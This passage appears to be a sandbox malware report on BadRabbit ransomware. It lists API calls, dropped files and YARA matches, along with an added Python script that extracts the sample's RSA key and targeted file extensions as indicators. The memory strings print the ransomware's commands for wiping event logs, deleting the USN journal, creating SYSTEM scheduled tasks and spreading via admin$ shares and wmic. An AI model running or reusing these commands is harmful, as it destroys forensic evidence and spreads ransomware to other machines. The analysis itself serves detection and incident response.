drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32memstr_e665ed98-6
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF60975214C GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,19_2_00007FF60975214C
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF609751864 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree,19_2_00007FF609751864
          Source: C:\Windows\dispci.exeCode function: 32_2_00A82020: TlsGetValue,CreateFileW,TlsSetValue,DeviceIoControl,GetLastError,32_2_00A82020
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_04BF9534
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,3_2_04BF9B63
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF8A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,3_2_04BF8A23
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeFile created: C:\Windows\infpub.dat
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.dat
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exe
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\D99F.tmp
          Source: C:\Windows\dispci.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\infpub.dat
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_0051201D
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_00513840
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_0051173C
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_005130E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BFA83C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BFC1E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BFB11D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF2708
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BFC940
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF609755C00
          Source: C:\Windows\dispci.exeCode function: 32_2_00A918BC
          Source: C:\Windows\dispci.exeCode function: 32_2_00A90C8F
          Source: C:\Windows\dispci.exeCode function: 32_2_00A82800
          Source: C:\Windows\dispci.exeCode function: 32_2_00A911E0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A925F4
          Source: C:\Windows\dispci.exeCode function: 32_2_00A882CA
          Source: C:\Windows\dispci.exeCode function: 32_2_00A9073E
          Source: Joe Sandbox ViewDropped File: C:\Windows\cscc.dat 0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
          Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: SecurityJump to behavior
          Source: LisectAVT_2403002C_35.exe, 00000000.00000002.1253396603.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlashUtil.exev+ vs LisectAVT_2403002C_35.exe
          Source: LisectAVT_2403002C_35.exe, 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFlashUtil.exev+ vs LisectAVT_2403002C_35.exe
          Source: LisectAVT_2403002C_35.exeBinary or memory string: OriginalFilenameFlashUtil.exev+ vs LisectAVT_2403002C_35.exe
          Source: unknownDriver loaded: C:\Windows\System32\cdd.dll
          Source: LisectAVT_2403002C_35.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: LisectAVT_2403002C_35.exe, type: SAMPLE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.LisectAVT_2403002C_35.exe.510000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.rundll32.exe.32943b8.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 3.3.rundll32.exe.32943b8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 0.2.LisectAVT_2403002C_35.exe.ede2e0.1.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 19.0.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.LisectAVT_2403002C_35.exe.510000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.32943b8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 3.3.rundll32.exe.32943b8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 19.2.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 32.2.dispci.exe.a80000.0.unpack, type: UNPACKEDPE | Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
Source: 32.2.dispci.exe.a80000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 32.0.dispci.exe.a80000.0.unpack, type: UNPACKEDPE | Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
Source: 32.0.dispci.exe.a80000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.rundll32.exe.32943b8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 3.2.rundll32.exe.32943b8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 3.3.rundll32.exe.32943b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 3.3.rundll32.exe.32943b8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPE | Matched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPE | Matched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPE | Matched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
Source: 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
Source: C:\Windows\cscc.dat, type: DROPPED | Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: C:\Windows\dispci.exe, type: DROPPED | Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
Source: C:\Windows\dispci.exe, type: DROPPED | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: cscc.dat.3.dr | Binary string: configFlags\Device\dcrypt\DosDevices\dcryptdump_hiber_%s\$dcsys$$dcsys$\Device\CdRom%s\$DC_TRIM_%x$$dcsys$_fail_%xNTFSFATFAT32exFATRSDS
Source: rundll32.exe, 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.00000000031FA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
Source: rundll32.exe, 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp, dispci.exe, 00000020.00000000.1308941790.0000000000A93000.00000002.00000001.01000000.00000008.sdmp, dispci.exe.3.dr | Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
Source: classification engine | Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@65/14@2/4
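Added example, not part of the Joe Sandbox report or of the sample's code: a Python script that pulls two actionable artifacts out of the memory string shown above, the attacker's RSA public key (a base64 SubjectPublicKeyInfo, which is what the "MIIB..." prefix denotes) and the dot-separated list of extensions the encryptor targets. It uses a minimal DER reader so it runs with the standard library only. EMBEDDED_BLOB is a constructed copy of the report's memory string, cut after the extension list; function names and the split logic are this example's own.

```python
import base64

# Constructed copy of the memory string reported above for rundll32.exe / dispci.exe:
# RSA SubjectPublicKeyInfo in base64, immediately followed by the dot-separated
# extension list. Cut after the extension list for this example.
EMBEDDED_BLOB = (
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA"
    "5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2T"
    "fBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVN"
    "BFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZ"
    "YsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQON"
    "W9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSB"
    "t1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB"
    ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf"
    ".cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd"
    ".hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf"
    ".odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf"
    ".png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar"
    ".tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx"
    ".vsv.work.xls.xlsx.xml.xvd.zip."
)

# DER encoding of OID 1.2.840.113549.1.1.1 (rsaEncryption)
RSA_ENCRYPTION_OID = bytes.fromhex("06092a864886f70d010101")


def _tlv(buf, pos):
    """Read one DER element at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length: next n bytes hold it
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(der):
    """Parse an RSA SubjectPublicKeyInfo; return (modulus, public_exponent)."""
    tag, spki, _ = _tlv(der, 0)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    tag, alg, pos = _tlv(spki, 0)           # AlgorithmIdentifier
    if tag != 0x30 or not alg.startswith(RSA_ENCRYPTION_OID):
        raise ValueError("algorithm is not rsaEncryption")
    tag, bits, _ = _tlv(spki, pos)          # BIT STRING; first byte = unused bits
    if tag != 0x03 or bits[0] != 0:
        raise ValueError("malformed subjectPublicKey BIT STRING")
    tag, rsakey, _ = _tlv(bits, 1)          # RSAPublicKey ::= SEQUENCE { n, e }
    if tag != 0x30:
        raise ValueError("RSAPublicKey must be a SEQUENCE")
    tag_n, n_bytes, pos = _tlv(rsakey, 0)
    tag_e, e_bytes, _ = _tlv(rsakey, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("modulus and exponent must be INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def split_blob(blob):
    """Separate the base64 key from the extension list.

    '.' is not in the base64 alphabet, so the first dot ends the key."""
    key_b64, _, rest = blob.partition(".")
    exts = ["." + x for x in rest.split(".") if x]
    return key_b64, exts


def key_params(blob=EMBEDDED_BLOB):
    """(modulus, exponent) of the public key embedded in the blob."""
    key_b64, _ = split_blob(blob)
    return parse_rsa_spki(base64.b64decode(key_b64))


def targeted_extensions(blob=EMBEDDED_BLOB):
    """Extensions the encryptor targets, as a list in the embedded order."""
    return split_blob(blob)[1]


if __name__ == "__main__":
    n, e = key_params()
    print(f"RSA-{n.bit_length()} public key, e={e}, modulus starts 0x{n >> 2040:02x}")
    exts = targeted_extensions()
    print(len(exts), "targeted extensions, e.g.", exts[:5])
```

The modulus or its fingerprint is a stable indicator across samples that share the embedded key, and the extension list is what lets you decide quickly whether a given file server or backup share was in scope for the encryptor.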
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF7CC5: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF9534: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF1368: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF84EE: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF8313: FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF9534: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError
Source: C:\Windows\dispci.exe | File created: C:\Users\Public\Desktop\DECRYPT.lnk
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7820:120:WilError_03
